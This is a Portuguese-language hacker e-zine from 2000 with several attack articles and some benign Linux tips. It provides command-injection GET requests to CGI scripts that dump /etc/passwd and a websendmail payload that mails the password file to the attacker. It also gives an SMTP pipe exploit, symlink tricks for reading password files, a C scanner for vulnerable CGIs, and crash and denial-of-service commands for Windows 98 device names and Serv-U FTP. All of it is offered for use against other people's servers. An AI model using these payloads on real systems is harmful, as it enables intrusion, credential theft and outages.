edit /b insanity09.txt for a better view
 
Edicao 09 - Fevereiro e Marco de 2000
http://www.insanityzine.org

INDICE
+-+-+-

01- d3v1c3 n4m3s = cr4sH!!! (part 1) ...............[dexter07]        
02- Cgi b4sics .....................................[DiabloW]
03- l1nuX g00di3s ..................................[DuCkWaGe]
04- s3rV-u FtP d0s .................................[dexter07]
05- cr4sh1ng w1nd0ws (part 2) ......................[DuCkWaGe]
06- h0mEp4gE sTaTs
07- MeMbeRs

OBS.: O autor(es) nao se responsabiliza por nada que voce venha a fazer 
depois de ler esse zine
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


+-+-+-+-+-+-+-+-+-+-+-+-+-+
01- d3v1c3 n4m3s = cr4sH!!!
+-+-+-+-+-+-+-+-+-+-+-+-+-+

este bug foi achado pelo securax crew (www.securax.org)
so funciona em windows 98
no 95,2000 e nt nao funciona, nem adianta testa

explicando o bug ae:

c voce tentar criar uma pasta com um nome de dispositivo logico
como por exemplo:

PRN (Primeira Impressora)
LPT1 (Primeira Porta de Impressora)                     
LPT2 (Segunda Porta de Impressora)
LPT3 (Terceira Porta de Impressora)
CON (Teclado)
AUX (Primeira Porta Serial)
COM1 (Primeira Porta de Comunicacoes)
COM2 (Segunda Porta de Comunicacoes)
COM3 (Terceira Porta de Comunicacoes)
COM4 (Quarta Porta de Comunicacoes)
NUL (dispositivo nulo, o famoso /dev/null em unix)
CLOCK$ (relogio do sistema)

vai dar erro
"..o nome do arquivo especificado eh invalido ou mto extenso,etc,etc..."
ja que nao da pra criar pasta com esse nome q tal rodar algum programa
q esteja em alguma dessas pastas q nao de pra criar?

por exemplo, va no Iniciar > Executar e digite:

c:\con\con

vai dar tela azul e depois trava tudo
eu consegui travar usando
o CON, AUX, NUL e CLOCK$
obs: e rodando c:\clock$\clock$ ainda some a barra de tarefas

ate ai nao serve pra nada ne
mas pensando bem no uso que voce pode dar pra isso
por exemplo se voce conectar num server de ftp rodando em windows 98
e der um cd /con/con ou /aux/aux ou /nul/nul ou ainda /clock$/clock$
vai trava o server
ja testei com o serv-u ftp e funfo
tambem deve funcionar com server http
ja testei com frontpage assim:
http://127.0.0.1/..../con/con
e tambem travo

e ate agora nao saiu patch pra isso

+-+-+-+-+-+-+-
02- Cgi b4sics
+-+-+-+-+-+-+-
Esta e' a primeira vez que estou escrevendo para o zine,espero que aprendam 
alguma coisa!!

O que  fiz aqui ah coisa basica,quando voce quer fazer algo em alguma 
homepage talvez isso seja
util,talvez nao quase sempre!
A primeira coisa a se fazer e' procurar por cgi-bin's na porta 80(http) do
servidor. Para isso eu uso o  telnet ao invez do meu browser.

	Ae vai uma lista dos comandos que uso frequentemente para verificar:

_____________________________________________________________________________
GET /cgi-bin/phf?Qalias=x%0acat%20/etc/passwd           # phf
GET /cgi-bin/php.cgi?/etc/passwd                        # php.cgi
GET /cgi-bin/test-cgi?/etc/*                            # test-cgi
GET /cgi-bin/query?%0a/bin/cat%20/etc/passwd            # query
GET /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd           # faxsurvey
GET /cgi-bin/htmlscript?../../../../etc/passwd          # htmlscript
GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd     # webdist.cgi
GET /cgi-bin/nph-test-cgi?/etc/*                        # nph-test-cgi
GET /cgi-bin/echo?%0Acat%20/etc/passwd                  # echo
GET /cgi-bin/view-source?../../../../../etc/passwd      # view-source
GET /cgi-bin/pfdispaly.cgi?/../../../../etc/passwd      # pfdisplay
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a             # campas
GET /cgi-bin/wrap?/../../../../../etc                   # wrap
GET /cgi-bin/handler/whatever;cat /etc/passwd|? data=Download
                                                        # whatever
GET /cgi-bin/handler/xenolith;cat  /etc/passwd/|   ?data=Download
                                                        # xenolith
POST /cgi-bin/websendmail HTTP/1.0
receiver=;mail+SEU@EMAIL.COM.BR</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
                                                        # websendmail
_____________________________________________________________________________

Existem uns (como por exemplo o whatever) que existem apenas em determinados
sistemas (no caso IRIX).Essa lista eu peguei numa hp,pra nao falar que eu 
que fiz!!

	Outro que encontrei em diversos SunOS e Linux foi o query e nao fun-
cionou a linha de comando mostrada acima. Mas fiquei sabendo de casos em que
funcionara entao tah ai na lista.

	Se depois de tudo isso ainda nao conseguir o arquivo de senhas (note
que as linhas acima procuram pelo /etc/passwd e devem ser mudadas caso o 
host
esteja com o passwd shadowed) eu tento dar um ftp anonymous.

	Em rarissimos casos eu encontrei o /etc/passwd sem shadow disponivel
para ftp anonymous. Porem nao e' descartada a possibilidade. Alem disso e'
sempre bom dar uma olhada no software de ftp.

	Apos isso, passe na rootshell(www.rootshell.com) e fa�a uma
busca por bugz neste software.

	Tambem veja se existe algum diretorio com permissao de escrita a voce,
caso tenha voce pode colocar programas que arrombam portas no servidor e um
.profile ativando-os.

	Por fim... Voce precisara' de uma conta shell. Entao acesse o telnet
do servidor e lah teste os diversos bugz e exploits que voce pode encontrar
em todo lugar por ae.

	Nao vou colocar muita coisa aqui.. apenas um basico do que jah e' usado
frequentemente em diversos servidores do pais e de fora.

_____________________________________________________________________________
cat /etc/passwd                            # happy lamah
_____________________________________________________________________________
cat /etc/shadow                            # me too
_____________________________________________________________________________
ypcat passwd                               # get yppasswd
_____________________________________________________________________________
pwget                                      # only HP-UX
_____________________________________________________________________________
rm -f .lastlogin                           # only SunOS
ln -s ~/.lastlogin /etc/passwd
logout
cat ~/.lastlogin
_____________________________________________________________________________
/usr/sbin/lquerypv -h /etc/passwd          # only AIX
_____________________________________________________________________________
ln -s /etc/passwd /tmp/dummy.dip           # only Linux
/sbin/dip -v /tmp/dummy.dip
_____________________________________________________________________________
ln -s /etc/passwd .fingerlog               # only Linux again
finger voce@localhost
_____________________________________________________________________________

	Por fim.. Se nada der certo, voce pode tentar usar o smtp do servidor.
Existem diversos bugz que podem ser exploitados. Como eu to me passando 
muito
vou colocar aqui apenas um bug para smtpd 5.55 ou 5.57 que e' encontrado em
versoes desatualizadas do SunOS e AIX.

_____________________________________________________________________________
mail from: "|/bin/mail seu@email.com < /etc/passwd"
rcpt to: inexistente
data
.
quit
_____________________________________________________________________________

	E' isso... Se depois de tudo isso o servidor ainda nao lhe der o file
de pwds, entao ai da pra come�ar a testar bugz mais complexos, enviando ex-
ploits para lah, por ftp e executando-os por telnet.

Esse checador de cgi e' bem simples, mas util. Ele simplesmente conecta
no servidor httpd do host designado, e procura por scripts cgi que 
apresentem
alguma vulnerabilidade. No total de scripts que este programa procura estao
19, os quais sao os seguintes:


   .o0o.   phf
   .oOo.   Count.cgi
   .o0o.   test-cgi
   .oOo.   php.cgi
   .o0o.   handler
   .oOo.   webgais
   .o0o.   websendmail
   .oOo.   webdist.cgi
   .o0o.   faxsurvey
   .oOo.   htmlscript
   .o0o.   pfdisplay
   .oOo.   perl.exe
   .o0o.   wwwboard.pl
   .oOo.   wrap
   .o0o.   handler
   .oOo.   info2www
   .o0o.   campas
   .oOo.   nph-test-cgi
   .o0o.   view-source


Quando o programa encontra o cgi, ele avisa com a mensagem "Encontrado!!! 
;)".
Ai' e' so exploitar o cgi. make nomedoarquivo - depois pra executar digite 
./nomedoarquivo

Ai' vai o codigo...

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

void main(int argc, char *argv[])
{
int sock,debugm,pausar,arq=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char mensagem[] = "200";
char *blaetal;
char buffer[1024];
int count=0;
int numin;
char bufferdocgi[1024];
char *caminhow[50];
char *cgibugado[50];

caminhow[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";
caminhow[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
caminhow[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
caminhow[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
caminhow[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";
caminhow[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
caminhow[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
caminhow[8] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
caminhow[9] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
caminhow[10] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
caminhow[11] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
caminhow[12] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
caminhow[13] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
caminhow[14] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
caminhow[15] = "GET /cgi-bin/handler/ HTTP/1.0\n\n";
caminhow[16] = "GET /cgi-bin/campas HTTP/1.0\n\n";
caminhow[17] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
caminhow[18] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
caminhow[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n";

cgibugado[1] = "phf";
cgibugado[2] = "Count.cgi";
cgibugado[3] = "test-cgi";
cgibugado[4] = "php.cgi";
cgibugado[5] = "handler";
cgibugado[6] = "webgais";
cgibugado[7] = "websendmail";
cgibugado[8] = "webdist.cgi";
cgibugado[9] = "faxsurvey";
cgibugado[10] = "htmlscript";
cgibugado[11] = "pfdisplay";
cgibugado[12] = "perl.exe";
cgibugado[13] = "wwwboard.pl";
cgibugado[14] = "wrap";
cgibugado[15] = "handler";
cgibugado[16] = "info2www";
cgibugado[17] = "campas";
cgibugado[18] = "nph-test-cgi";
cgibugado[19] = "view-source";
if (argc<2)
   {
   printf("\nUso:[1m %s host[0m",argv[0]);
   printf("\n   Ou:[1m %s host -d [0mpara o modo em debug",argv[0]);
   printf("\n   Ou ainda:[1m %s host -d -p [0mpara o modo em debug com 
pausas\n",argv[0]);
   exit(0);
   }

if (argc>2)
   {
   if(strstr("-d",argv[2]))
     {
     debugm=1;
     }
   }

if (argc>3)
  {
  if(strstr("-p",argv[3]))
    {
    pausar=1;
    }
   }

if ((he=gethostbyname(argv[1])) == NULL)
   {
   herror("gethostbyname");
   exit(0);
   }

printf("\n\nChecador de CGI feito originalmente por [CKS & Fdisk]");
printf("\n\n[1mTraduzido  por DiAbLoW <diablown@hotmail.com>[0m\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);

   sock=socket(AF_INET, SOCK_STREAM, 0);
   bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
   sin.sin_family=AF_INET;
   sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     perror("connect");
     }
   printf("\n\n\t\t -=[     Checando a versao do httpd     ]=-\n");
   send(sock, "HEAD / HTTP/1.0\n\n",17,0);
   recv(sock, buffer, sizeof(buffer),0);
   printf("%s",buffer);
   close(sock);
   printf("\n\t\t -=[ Iniciando a procura pelos CGI's... ]=-\n");
while(count++ < 19)
   {
   printf("Procurando por %s: ",cgibugado[count]);
   sock=socket(AF_INET, SOCK_STREAM, 0);
   bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
   sin.sin_family=AF_INET;
   sin.sin_port=htons(80);
   if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     perror("connect");
     }
   for(numin=0;numin < 1024;numin++)
      {
      bufferdocgi[numin] = '\0';
      }

   send(sock, caminhow[count],strlen(caminhow[count]),0);
   recv(sock, bufferdocgi, sizeof(bufferdocgi),0);
   blaetal = strstr(bufferdocgi,mensagem);
   if(blaetal != NULL)
       printf("[1mEncontrado!!! [0m;)[0m\n");
       else
        printf("Nao encontrado\n");
        if(debugm==1)
    {
    printf("\n\n *************************\n\t %s \n 
*************************\n",bufferdocgi);
    if(pausar==1)
     {
     printf("\nPressione qualquer tecla para continuar...");
     getchar();
     }
   }
  close(sock);
  }
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

(Esse cgi foi compilado no linux 6.0!, ele pode apresentar algum erro ao 
compilar,mas ele compila
normal!!)

+-+-+-+-+-+-+-+-+
03- l1nuX g00di3s
+-+-+-+-+-+-+-+-+

.1 - Informacoes sobre memoria
.2 - Mensagens de boot
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

.1 - Informacoes sobre memoria

Retirada da DICAS-L.
--------------------------------------------------------------
As informacoes a respeito da memoria de seu sistema podem 
ser obtidas a partir do arquivo `/proc/meminfo':

$ cat /proc/meminfo
        total:    used:    free:  shared: buffers:  cached:
Mem:  31379456 29294592  2084864 28839936   765952 13189120
Swap: 84602880   929792 83673088
MemTotal:     30644 kB
MemFree:       2036 kB
MemShared:    28164 kB
Buffers:        748 kB
Cached:       12880 kB
SwapTotal:    82620 kB
SwapFree:     81712 kB        

Normalmente sistemas Linux reconhecem toda a memoria existente em
um sistema. Em meu sistema pessoal, conforme pode-se ver acima, estao
disponiveis 32MB de memoria real, 84MB de area de Swap e varias outras
informacoes. Caso esta informacao esteja diferente da configuracao de seu
sistema, que utiliza menos memoria do que o disponivel, basta editar o
arquivo `/etc/lilo.conf' e incluir na primeira linha a seguinte diretiva:

append="mem=128M"

O arquivo `/etc/lilo.conf' completo devera ficar como abaixo:

append="mem=128M"
boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=50
other=/dev/hda1
label=dos
table=/dev/hda
image=/boot/vmlinuz-2.2.14-1cl
label=linux
root=/dev/hdb1
read-only
password=root

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

.2 - Mensagens de boot

Esta materia foi retirada da DICAS-L. 
Eu achei interessante coloca-la na zine por que tenho
certeza que muita gente nao sabe disso e gostaria de saber!!!
------------------------------------------------------------------------
Durante o boot do sistema aparecem diversas mensagens que mesmo
que tentemos ler nao conseguimos. Passam pela tela muito rapido.
Embora nao pareca, muitas mensagens importantes aparecem na tela.
Quantidade de memoria disponivel, placas de som e de rede detectadas,
CDROM, monitor de video, discos rigidos, e muito mais.

Para visualizar estas mensagens com o sistema no ar, basta
usar o comando dmesg:

$ dmesg | more

Ou melhor ainda, para analisar com mais calma, redirecione 
a saida do comando dmesg para um arquivo:

$ dmesg > mensagens.boot

Normalmente nao precisamos nos preocupar com estas mensagens.
Quando a maquina comeca a apresentar problemas, pode ser interessante
analisarmos estas mensagens para ver se algum problema foi detectado
durante o boot do sistema operacional.

+-+-+-+-+-+-+-+-+-
04- s3rV-u FtP d0s
+-+-+-+-+-+-+-+-+-


um dos ae pra vc derrubar uns servers de ftp por ae
eh bem facil
vc conecta em algum server rodando serv-u
o q nao eh dificil de achar
geralmente servers de mp3 usam
vc loga , pode ser ate como anonymous e digita:

site pswd " "

teste em 9x e funfo
nao sei se no 2000 ou nt funfa
mas 95 funfa
ate a versao 2.5d


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
05- cr4sh1ng w1nd0ws (part 2)
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Esta nao e' bem uma materia, e' apenas uma dica de como fazer
o Explorer dar pau!!!!
E' o seguinte, pegue o arquivo check.xxx q vem junto com a zine, o renomeie
para check.lnk e coloque no raiz (c:\). E depois entre no explorer e observe
q vai dar erro.
Para remover o arquivo entre no prompt do ms-dos e apague por la!!!
Pode ficar tranquilo que o arquivo nao vai danificar nada no seu sistema.
Funciona em windows 95, windows 98 e 2000.

o explorer trava quando "ve" esse arquivo .lnk em algum diretorio.
Voce nao consegue editar esse arquivo usando algum editor hexa no windows.
Todos programas travam qdo "veem" ele.
so experimente coloca-lo no desktop....

so pra lembrar o arquivo vem atachado ao .zip da zine como check.xxx

+-+-+-+-+-+-+-+-+-
06- h0mEp4gE sTaTs
+-+-+-+-+-+-+-+-+-

T0taL viSitS: 
1704


D0MaIns:

Unknown (.???)....26% (-1%)
Brasil (.BR)......26% (-11%) 
Networks (.NET)...14% (+1%)
Commercial (.COM).11% (+2%)
Holanda (.NL).....4%  ( - )
Australia (.AU) ..3%  ( - )

Br0wSerS:

Exploder 5.X....32% (+8%)
Exploder 4.X....31% (-8%)
Netscape 4.X....29% (-1%)
Exploder 3.X....1%  ( = )
Netscape 3.X....1%  ( = )
Others..........6%  (+1%)

obs.: exploder fede

Os'S:

Windows 98....47% (+1%)
Windows 95....29% (-10%)
Windows NT....13% (+5%)
misc Unix.....3%  (+2%)
Unknown.......2%  ( = )
Mac ..........1%  ( - )

obs.: misc Unix=(AIX,Linux,Unix,Irix,BSD's,etc..)

+-+-+-+-+-+
07-MeMbeRs
+-+-+-+-+-+

M3MB3R5:

dexter07 (dexter07@insanityzine.org)
DuCkWaGe (duckwage@insanityzine.org)

ColAb0r4d0r3S:

DiabloW

-------------------------------------------------------------------
-SE VOCE FOR COPIAR ALGUM TEXTO INSIRA A SEGUINTE LINHA           -
-(INSANITY ZINE,EDICAO XX,AUTOR:XXXX)                             -
-------------------------------------------------------------------
